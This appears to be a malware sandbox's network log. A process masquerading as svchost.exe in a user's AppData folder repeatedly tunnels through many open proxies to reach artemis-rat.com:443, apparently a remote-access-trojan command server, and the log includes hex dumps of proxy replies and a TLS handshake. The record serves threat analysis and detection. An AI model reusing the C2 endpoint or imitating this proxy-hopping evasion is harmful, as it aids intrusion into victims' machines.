Mar 9, 2024 13:14:28.262767076 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1957	192.168.2.5	56012	94.131.63.44	3128	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:28.265136957 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:28.485569954 CET	1260	IN	HTTP/1.1 403 Forbidden Server: squid/6.0.0-20220501-re899e0c27 Mime-Version: 1.0 Date: Sat, 09 Mar 2024 12:14:28 GMT Content-Type: text/html;charset=utf-8 Content-Length: 3670 X-Squid-Error: ERR_ACCESS_DENIED 0 Vary: Accept-Language Content-Language: en Cache-Status: ezproxies.com Via: 1.1 ezproxies.com (squid/6.0.0-20220501-re899e0c27) Connection: keep-alive Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta type="copyright" content="Copyright (C) 1996-2022 The Squid Software Foundation and contributors"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>ERROR: The requested URL could not be retrieved</title><style type="text/css">... /* * Copyright (C) 1996-2022 The Squid Software Foundation and contributors * * Squid software is distributed under GPLv2+ license and includes * contributions from numerous individuals and organizations. * Please see the COPYING and CONTRIBUTORS files for details. // Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License// Page basics / {font-family: verdana, sans-seri

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1958	192.168.2.5	55819	61.129.2.212	8080	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:28.282676935 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:28.651648045 CET	536	IN	HTTP/1.1 502 Bad Gateway Server: nginx/1.20.1 Date: Sat, 09 Mar 2024 12:11:30 GMT Content-Type: text/html; charset=utf-8 Content-Length: 559 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 30 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 Data Ascii: <html><head><title>502 Bad Gateway</title></head><body><center><h1>502 Bad Gateway</h1></center><hr><center>nginx/1.20.1</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padd

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1959	192.168.2.5	56115	104.129.199.57	8800	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:28.289586067 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:28.450378895 CET	125	IN	HTTP/1.1 407 Unauthorized Server: Zscaler/6.2 Cache-control: no-cache Content-Length: 0 Proxy-Authenticate: Negotiate

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1960	192.168.2.5	55889	91.241.217.58	9090	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:28.294230938 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1961	192.168.2.5	56055	38.183.135.189	999	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:28.297672033 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:31.992994070 CET	19	IN	HTTP/1.1 200 OK

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1962	192.168.2.5	56112	43.153.22.29	10005	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:28.301623106 CET	193	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com
Mar 9, 2024 13:14:28.475905895 CET	39	IN	HTTP/1.1 200 Connection established
Mar 9, 2024 13:14:28.475969076 CET	160	IN	HTTP/1.1 401 UnauthorizedContent-Type: text/plain; charset=utf-8WWW-Authenticate: Basic realm="proxy"errorMsg: The IP specified by the port is not availabl Data Raw: Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1963	192.168.2.5	55941	152.32.132.220	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:28.311263084 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:28.973779917 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:29.942898989 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:31.834081888 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:35.646472931 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1964	192.168.2.5	56010	46.17.63.166	16379	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:28.345906019 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:28.662237883 CET	339	IN	HTTP/1.1 403 Forbidden Server: squid/4.7 Mime-Version: 1.0 Date: Sat, 09 Mar 2024 12:14:28 GMT Content-Type: text/html;charset=utf-8 Content-Length: 5 X-Squid-Error: TCP_RESET 0 Vary: Accept-Language Content-Language: en X-Cache: MISS from proxy.wakoopa.com Via: 1.1 proxy.wakoopa.com (squid/4.7) Connection: keep-alive Data Raw: 72 65 73 65 74 Data Ascii: reset

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1965	192.168.2.5	55987	211.222.252.187	8193	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:28.345994949 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1966	192.168.2.5	55617	36.134.91.82	8888	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:28.345995903 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:29.005038977 CET	324	IN	HTTP/1.1 400 Bad Request Server: nginx/1.16.1 Date: Sat, 09 Mar 2024 12:14:34 GMT Content-Type: text/html; charset=utf-8 Content-Length: 157 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.16.1</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1967	192.168.2.5	55981	194.34.232.107	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:28.348628998 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:28.652441025 CET	442	IN	HTTP/1.1 403 Forbidden Date: Sat, 09 Mar 2024 12:14:28 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 281 Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 20 50 6f 72 74 20 34 34 33 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at artemis-rat.com Port 443</address></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1968	192.168.2.5	55989	13.37.59.99	3128	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:28.349275112 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:28.646923065 CET	116	IN	HTTP/1.1 200 OK Date: Sat, 09 Mar 2024 12:14:28 GMT Server: nginx Content-Type: text/plain Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1969	192.168.2.5	55942	112.78.165.60	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:28.349968910 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:29.067466974 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:33.552197933 CET	19	IN	HTTP/1.1 200 OK
Mar 9, 2024 13:14:33.608123064 CET	177	OUT	Data Raw: 16 03 03 00 ac 01 00 00 a8 03 03 65 ec 52 a8 32 96 78 51 a8 b0 e3 a1 23 25 c4 72 22 64 64 2e 84 29 15 a5 5a 1b e5 c1 5d 38 9c 04 00 00 2a c0 2c c0 2b c0 30 c0 2f 00 9f 00 9e c0 24 c0 23 c0 28 c0 27 c0 0a c0 09 c0 14 c0 13 00 9d 00 9c 00 3d 00 3c Data Ascii: eR2xQ#%r"dd.)Z]8*,+0/$#('=<5/Uartemis-rat.com#
Mar 9, 2024 13:14:33.995410919 CET	1286	IN	Data Raw: 16 03 03 00 43 02 00 00 3f 03 03 65 ec 52 a9 51 c6 f0 51 21 f9 06 1f 70 f9 ca ab 9b d8 3c 60 e6 9b 89 1a 44 4f 57 4e 47 52 44 01 00 c0 2f 00 00 17 00 00 00 00 00 17 00 00 ff 01 00 01 00 00 0b 00 02 01 00 00 23 00 00 16 03 03 10 6b 0b 00 10 67 00 Data Ascii: C?eRQQ!p<`DOWNGRD/#kgde0a0I?LR0*H0F10UUS1"0 UGoogle Trust Services LLC10UGTS CA 1P50240214225240Z240514225239Z010
Mar 9, 2024 13:14:33.995491982 CET	1286	IN	Data Raw: 98 6e 71 f4 11 ac 4d b8 a7 7d 6f da c6 bc f4 b1 9e 56 4d 29 6b 80 18 2b 54 cc 2f af 96 ce 21 d1 4a a2 d6 af dc dc c3 23 73 8a f8 60 aa 82 11 8f 73 e6 dd de ff f1 c4 74 75 19 89 f2 11 f3 81 b3 5c 09 1f 05 21 66 f5 dc f5 01 c2 34 dc e1 8e 2b 77 c7 Data Ascii: nqM}oVM)k+T/!J#s`stu\!f4+wF3yO3RDw.QJRh8?hXZR`UHG3XF%~ t\5\|0F<Arp'~00tP'S"0*H0G10UUS
Mar 9, 2024 13:14:33.995513916 CET	1286	IN	Data Raw: 9f 57 a9 41 6d 5a 90 a7 db 3a ea 75 80 0c 63 0b 69 74 6f 07 4c 15 f3 37 28 a5 19 a4 6e f5 f6 20 cd 63 b2 7e c4 2b 09 75 89 da d1 3c 2e 72 4f 36 1a a1 9e 44 d0 cd 9b a6 23 08 3f 97 a1 a7 9e 5a a5 f7 09 94 ad 5d 76 5d 28 56 d1 1a 66 51 51 07 7b de Data Ascii: WAmZ:ucitoL7(n c~+u<.rO6D#?Z]v](VfQQ{=0z$-KO?'>#ZB-z6=`9cxN!>\9+S/tgw7-[peZ%wjNuMjfynm"m,P5}pY*
Mar 9, 2024 13:14:33.995532036 CET	238	IN	Data Raw: 30 02 86 1d 68 74 74 70 3a 2f 2f 70 6b 69 2e 67 6f 6f 67 2f 67 73 72 31 2f 67 73 72 31 2e 63 72 74 30 32 06 03 55 1d 1f 04 2b 30 29 30 27 a0 25 a0 23 86 21 68 74 74 70 3a 2f 2f 63 72 6c 2e 70 6b 69 2e 67 6f 6f 67 2f 67 73 72 31 2f 67 73 72 31 2e Data Ascii: 0http://pki.goog/gsr1/gsr1.crt02U+0)0'%#!http://crl.pki.goog/gsr1/gsr1.crl0;U 4020g0g0+y0+y0*H4(v1z!R>tA=5\_\|W&o[Fh7okz7%Qh
Mar 9, 2024 13:14:34.345110893 CET	498	IN	Data Raw: 49 fd 5a 9a ca 01 23 ac 84 80 2b 02 8c 99 97 eb 49 6a 8c 75 d7 c7 de b2 c9 97 9f 58 48 57 0e 35 a1 e4 1a d6 fd 6f 83 81 6f ef 8c cf 97 af c0 85 2a f0 f5 4e 69 09 91 2d e1 68 b8 c1 2b 73 e9 d4 d9 fc 22 c0 37 1f 0b 66 1d 49 ed 02 55 8f 67 e1 32 d7 Data Ascii: IZ#+IjuXHW5ooNi-h+s"7fIUg2&p=gm=\|42njoK;7D~lF!fUl)f[wIH(3rS5b$9~AR?,( B@/7P\|3cM$/;L-
Mar 9, 2024 13:14:34.346390009 CET	93	OUT	Data Raw: 16 03 03 00 25 10 00 00 21 20 4b 9c e4 ae 88 23 e1 b7 c3 e0 82 1b fc 57 29 d7 b5 74 c9 32 fc fe 21 3b 0a 0e 01 6e af 65 b0 6a 14 03 03 00 01 01 16 03 03 00 28 00 00 00 00 00 00 00 00 0b 0c 3c 39 7a 97 eb af 19 47 c1 72 53 f9 99 de 76 22 96 b6 0e Data Ascii: %! K#W)t2!;nej(<9zGrSv"{qJ
Mar 9, 2024 13:14:34.722484112 CET	258	IN	Data Raw: 16 03 03 00 ca 04 00 00 c6 00 00 fd 1f 00 c0 5a 17 6c fc 96 79 f4 13 45 84 8d 90 63 af ff 94 d6 fd 8a 43 38 c3 29 6c 09 b7 a7 90 d9 f1 d9 48 d2 40 d4 df 5e 6e 0e eb c4 cc 2e ec 9c e2 80 c0 e9 19 7e d8 20 fd 35 24 c6 db 63 b0 45 f4 6d 96 5b 6d bd Data Ascii: ZlyEcC8)lH@^n.~ 5$cEm[m48f{XADrptx\9N~&m]i`h)MOYiVuCkC2ng{`U]pe2JFP(?p'ebW
Mar 9, 2024 13:14:34.768305063 CET	252	OUT	Data Raw: 17 03 03 00 f7 00 00 00 00 00 00 00 01 1d 3c aa 26 11 da 1e 3c aa 03 06 c3 29 99 81 b2 5f 10 2b 33 7c 87 8b 15 b1 4e af e4 be e7 e8 40 36 84 a9 ca 3e 24 fd f0 78 10 db 93 ad 06 30 2f 8b 16 97 12 67 c2 6a 7d c2 5c fa 6a 83 d8 53 75 69 ea ae 53 8e Data Ascii: <&<)_+3\|N@6>$x0/gj}\jSuiSS{A00tk'{8tZ$<7F~ 7z_Y>${;A6<Un%-`]/~#]2W8ksTp%qu=rVf-Zv
Mar 9, 2024 13:14:35.158457041 CET	1286	IN	Data Raw: 17 03 03 05 71 00 00 00 00 00 00 00 01 ab 07 c7 cb fa 83 97 1e a3 31 22 88 ff c0 13 15 74 02 c8 d7 88 27 d9 ba 28 37 15 8f 88 ec 33 9a 53 b1 fe ca fe 14 55 cd 61 bc a1 5f a7 00 75 41 47 4e 05 36 73 fc 96 9c f0 1f 59 20 87 fc a1 2b fb 47 83 8b 26 Data Ascii: q1"t'(73SUa_uAGN6sY +G&r7J n;)g%TaV-8C=yUlp:(9$27!n{kN}`%rI76D\|z$uDWuoK'?

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1970	192.168.2.5	56072	70.166.167.55	57745	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:28.350308895 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1971	192.168.2.5	56011	43.131.248.165	15673	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:28.368232012 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1972	192.168.2.5	56001	123.126.158.50	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:28.368235111 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1973	192.168.2.5	56184	104.17.248.164	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:28.368618011 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
